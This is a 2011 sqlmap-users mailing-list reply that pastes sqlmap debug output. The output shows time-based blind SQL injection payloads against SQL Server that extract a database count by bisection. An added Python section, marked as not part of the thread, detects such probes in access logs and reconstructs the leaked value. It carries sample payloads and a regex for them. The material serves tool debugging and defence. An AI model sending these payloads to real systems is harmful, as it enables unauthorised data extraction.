Re: [sqlmap-users] New SQL Server blind test
From: Steve P. <ste...@gm...> - 2011-01-18 01:59:22
On 01/17/2011 08:25 PM, Miroslav Stampar wrote:
> ok, fair enough.
>
> please just send one of payloads used for data retrieval (something
> like this one):
>
> [02:20:30] [PAYLOAD] 1 AND 9290=IF((ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR), CHAR(32))) FROM information_schema.SCHEMATA LIMIT 0, 1), 1, 1)) > 104), SLEEP(5), 9290)
>
> you'll see them with -v 3. you can censor table names. please, i just
> want to see something workable used for data retrieval (just spot
> those payloads with '>' inside)
>
> kr

Since you seem anxious, I'll send the warm up.. Hasn't hit the good part yet. ;-)

[09:41:40] [INFO] fetching database names
[09:41:40] [INFO] fetching number of databases
[09:41:40] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 1, 1)) > 51) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
[09:41:40] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[09:41:57] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 1, 1)) > 48) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
[09:42:28] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 1, 1)) > 49) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
[09:42:58] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 1, 1)) > 50) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
[09:42:59] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 2, 1)) > 51) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
[09:43:23] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 2, 1)) > 54) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
[09:43:23] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 2, 1)) > 52) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
[09:43:36] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 3, 1)) > 51) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
[09:43:36] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 3, 1)) > 48) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
[09:43:37] [PAYLOAD] asdf'IF(ASCII(SUBSTRING((SELECT ISNULL(CAST(LTRIM(STR(COUNT(name))) AS VARCHAR(8000)), CHAR(32)) FROM master..sysdatabases), 3, 1)) > 1) WAITFOR DELAY '0:0:12'-- AND 'MQWi'='MQWi
[09:43:37] [INFO] retrieved: 24
[09:43:37] [DEBUG] performed 10 queries in 117 seconds

--
| Steven Pinkham, Security Consultant |
| http://www.mavensecurity.com        |
| GPG public key ID CD31CAFB          |
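As an added, defender-side example that is not part of the thread: given web-server access logs that record request duration, a parser can pick out WAITFOR DELAY probes of the shape shown above and replay the bisection from each probe's response time, recovering what the injection read (the constructed sample below yields the same "24" that the sqlmap log reports). The log format, source IP, path and timings are constructed assumptions, not data from the thread.

```python
import re

# Constructed nginx-style access log (not from the thread); the last field is
# $request_time in seconds. Payloads follow the MSSQL time-based test quoted above.
def _probe(ts, pos, thr, rt):
    payload = ("asdf'IF(ASCII(SUBSTRING((SELECT COUNT(name) FROM master..sysdatabases), "
               f"{pos}, 1)) > {thr}) WAITFOR DELAY '0:0:12'--")
    return f'10.0.0.5 - - [18/Jan/2011:{ts}] "GET /item?id={payload} HTTP/1.1" 200 512 {rt}'

SAMPLE_LOG = [
    '10.0.0.5 - - [18/Jan/2011:09:41:40] "GET /item?id=asdf HTTP/1.1" 200 512 0.03',
    _probe("09:41:57", 1, 48, 12.41), _probe("09:42:28", 1, 49, 12.37),
    _probe("09:42:58", 1, 50, 0.04), _probe("09:42:59", 2, 51, 12.39),
    _probe("09:43:23", 2, 54, 0.05), _probe("09:43:23", 2, 52, 0.04),
    _probe("09:43:36", 3, 51, 0.04), _probe("09:43:36", 3, 48, 0.03),
    _probe("09:43:37", 3, 1, 0.05),
]

PAYLOAD_RE = re.compile(  # SUBSTRING(<expr>, <pos>, 1)) > <thr>) WAITFOR DELAY 'h:m:s'
    r"SUBSTRING\(.*?,\s*(?P<pos>\d+),\s*1\)\)\s*>\s*(?P<thr>\d+)\)\s*"
    r"WAITFOR\s+DELAY\s+'(?P<h>\d+):(?P<m>\d+):(?P<s>\d+)'", re.IGNORECASE)

def parse_line(line):
    """Fields of one WAITFOR-style probe (source IP, position, threshold, delay, time); None otherwise."""
    m = PAYLOAD_RE.search(line)
    if not m:
        return None
    return {"ip": line.split(" ", 1)[0], "pos": int(m["pos"]), "thr": int(m["thr"]),
            "delay": int(m["h"]) * 3600 + int(m["m"]) * 60 + int(m["s"]),
            "request_time": float(line.rsplit(None, 1)[-1])}

def reconstruct(lines, ratio=0.8):
    """Replay the bisection: each probe answers 'code > thr?' through its response time,
    so keep an interval low < code <= high per position. Returns (text, probes per IP)."""
    bounds, attempts = {}, {}
    for rec in filter(None, map(parse_line, lines)):
        attempts[rec["ip"]] = attempts.get(rec["ip"], 0) + 1
        b = bounds.setdefault(rec["pos"], [0, 127])
        if rec["request_time"] >= ratio * rec["delay"]:  # delay fired: condition was true
            b[0] = max(b[0], rec["thr"])
        else:
            b[1] = min(b[1], rec["thr"])
    text = ""
    for pos in sorted(bounds):
        low, high = bounds[pos]
        if high <= 1:  # sqlmap's end-of-value probe ("> 1" answered false)
            break
        text += chr(high) if high - low == 1 else "?"
    return text, attempts
```

Positions whose interval never narrows to a single code come back as "?", so a partially logged or rate-limited run still shows how far the extraction got.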